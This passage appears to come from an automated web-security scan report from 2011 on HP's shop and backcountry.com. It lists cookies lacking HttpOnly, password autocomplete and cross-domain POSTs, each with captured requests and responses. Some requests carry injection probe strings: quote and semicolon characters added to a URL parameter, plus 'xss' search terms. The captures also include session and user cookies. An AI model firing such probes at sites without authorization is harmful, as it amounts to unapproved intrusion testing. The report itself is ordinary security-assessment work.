GET /webapp/shopping/search_request.do;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?searchType=keyword&inkTonerSearchQuery=&pageName=home&Printer_Search_Query=&Cartridge_Search_Query=&printerOrCartridgeSearch=&locationOfSearchQuery=&returnUrlQueryString=&searchQuery=xss+printer HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlkviNuV2Qh%2FMS3uvFPdcQKd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=6; s_var_20=in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Aprinters%20%26%20all-in-ones; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x5x34; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Ahome%2526pidt%253D1%2526oid%253DSearch%2526oidt%253D3%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:05 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlksi9Ge2gh4NinvvVvZdgWa0ic%3D&s1=xss+printer; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hpcomsh_usen=s1=xss+printer&s1_context=hhostore&s2_context=hpcomsearch&s2=xss; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:06 GMT; path=/
Set-Cookie: hho_omni_usen=window.hpmetrics.isearch%3D%7B%27search_term%27%3A%27xss+printer%27%2C%27search_referrer%27%3A%27home%27%2C%27searchtype%27%3A%27search_noresults_keyword%27%2C%27sort%27%3A%27most_popular%27%2C%27numrecords%27%3A0%2C%27numchosen%27%3A0%2C%27resultset%27%3A0%2C%27refinepath%27%3A%27%27%2C%27correct%27%3A0%2C%27suggest%27%3A%27%27%2C%27search_platform%27%3A%27EA%27%2C%27searchresultpage%27%3Atrue%2C%27searchrefine%27%3Afalse%7D; domain=.hp.com; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 1867


<html>
<body>

<!-- SiteCatalyst code version: F.3.
Copyright 2006 Omniture, Inc. More info available at
http://www.omniture.com Testing -->
<s
...[SNIP]...

4.76. http://www.shopping.hp.com/webapp/shopping/series_can.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/series_can.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/shopping/series_can.do?storeName=computer_store&landing=desktops&a1=Category&v1=All-in-One+PCs&jumpid=in_R329_prodexp/hhoslp/psg/desktops/All-in-One_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; 
ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fseries_can.do_storeName%25253Dcomputer_store%252526landing%25253Ddesktops%252526a1%25253DCategory%252526v1%25253DAll-in-On_5%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:49 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:50 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 168108


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.77. http://www.shopping.hp.com/webapp/shopping/store_access.do

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/store_access.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home4923e'%3b1cd62d1ca9e
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; hpshopping=1&user_id=mlkqgtqf2Qt7MiHjv1bYeQeXlmvi; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e'%3B1cd62d1ca9e; hp_cust_seg_sel=HHO; gpv_pN=no%20value; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%5D; lang=en-us; cc=us; prop12=r602; EMID=; s_depth=14; s_cc=true; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; HP_EBUS_HP_CLICKS=4x12x2345; 
s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhttp%25253A%25252F%25252Fwww.shopping.hp.com%25252Fdesktops%25253BHHOJSID%25253DHWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182%25253Fjumpid_t%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_desktops_home4923e'%2525253b1cd62d1ca9e%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fstore_access.do_template_type%25253Dseries_detail%252526category%25253Ddesktops%252526series_name%25253Dp7xt_s_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26hphqhhomktg%3D%2526pid%253Dhho%25257CEC%25257Cus%25257Cen%25257CFlash%252520%25253A%252520Main%252520%25253A%252520%252520Whats%252520hot%252520%25253A%252520Feature%2525201%252520%25253A%252520HP%252520Coolsense%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fh71036.www7.hp.com%25252Fhho%25252Fus%25252Fen%25252Fpclc%25252Farticles%25252Fcoolsense-technology.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:00:03 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjg92V0Q14NS%2FivlvfcASe0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 01:00:03 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 241316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

5. Password field with autocomplete enabled
There are 2 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.backcountry.com/store/user.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The page contains a form with the following action URL: The form contains the following password fields with autocomplete enabled:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
</div>


<form id="new_account" action="https://www.backcountry.com/store/user/create_new_account.html" method="POST">
<input type="hidden" name="mv_form_profile" value="create_new_account_profile" />
...[SNIP]...
<td><input type="password" name="mv_password" id="mv_password" class="entry" value="" /></td>
...[SNIP]...
<td><input type="password" name="mv_verify" id="mv_verify" class="entry" value="" /></td>
...[SNIP]...

5.2. http://www.backcountry.com/store/user.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.backcountry.com
Path:   /store/user.html

Issue detail

The page contains a form with the following action URL: The form contains the following password field with autocomplete enabled:

Request

GET /store/user.html HTTP/1.1
Host: www.backcountry.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid_w4kr1ll1r0=2ABAD7B1-7D08-4A54-B5F7-5E536E68E075; s_cpm=%5B%5B%27Direct%2520Load%27%2C%271316711542269%27%5D%5D; s_vi=[CS]v1|273D92EC05013BC2-40000109E026E9CB[CE]; rdv_test_group=1; RES_TRACKINGID=841292264887481; __utmx=248652180.; __utmxx=248652180.; __utma=248652180.1694759348.1316711586.1316711586.1316711586.1; __utmb=248652180.1.10.1316711586; __utmc=248652180; __utmz=248652180.1316711586.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __ar_v4=; mr_referredVisitor=0; mr_domainUserTicketID=1039053c-e24c-b398-c4aa-7037768e3b34; mt.v=1.346469883.1316711542790; 9551721-VID=5110247826455; 9551721-SKEY=8682657700751775312; HumanClickSiteContainerID_9551721=STANDALONE; tr_template=; promo_nav=; s_cc=true; utag=session_id:1316711948944$_session:1316713441727; shipping_selection=FREE; MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; CART=mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23mi%3d500%3bq%3d1%3bpr%3d125%2e00%3bsku%3dBCS0021%2dBCSGC125%2dONSI%3bhasbox%3d0%3b%23; siec=false; affiliate_reference_id=R999; c49=Step%202%20Place%20Your%20Order%20Error; s_sc_scOpen=1; s_sq=bcbackcountry%3D%2526pid%253DStep%2525202%252520Place%252520Your%252520Order%252520Error%2526pidt%253D1%2526oid%253Dhttp%25253A//www.backcountry.com/store/user.html%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache
X-Session-Path: Long id in cookie
X-Session-Checked: 1
P3P: CP="IND NON DSP PHY ONL UNI FIN PUR COM INT DEM CNT STA PRE POL CUR ADMa PSAo PSDo IVAo IVDo CONo OUR", policyref="http://www.backcountry.com/w3c/p3p.xml"
Cache-Control: s-maxage=3600
Edge-Cache: max-age=3600
X-HandledBy: arches
Content-Length: 33985
Content-Type: text/html; charset=iso-8859-1
Date: Thu, 22 Sep 2011 12:13:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: MV_SESSION_ID=TUtKhM3y:nobody:plata:ab0ee0ab; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT
Set-Cookie: siec=false; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: affiliate_reference_id=R999; path=/; expires=Tue, 21-Sep-2021 22:13:26 GMT
Set-Cookie: omn_cookie=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: tr_template=; path=/; expires=Fri, 23-Sep-2011 12:13:26 GMT
Set-Cookie: cart_cross_sell=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_content_upload=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_poos=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: saw_order_detail=; path=/; expires=Thu, 01-Jan-1970 00:00:12 GMT
Set-Cookie: promo_nav=; path=/; expires=Sun, 19-Sep-2021 12:13:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphp
...[SNIP]...
<div id="returning_and_forgotten">
<form id="returning_customer" action="https://www.backcountry.com/store/user/do_login.html" method="POST">
<input type="hidden" name="prev_vars" value="" />
...[SNIP]...
<td><input type="password" name="mv_password" id="mv_password" class="entry" value="" /></td>
...[SNIP]...

6. Cross-domain POST
There are 11 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


6.1. http://www.shopping.hp.com/design

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The page contains a form which POSTs data to the domain suth.ehosts.net. The form contains the following fields:

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
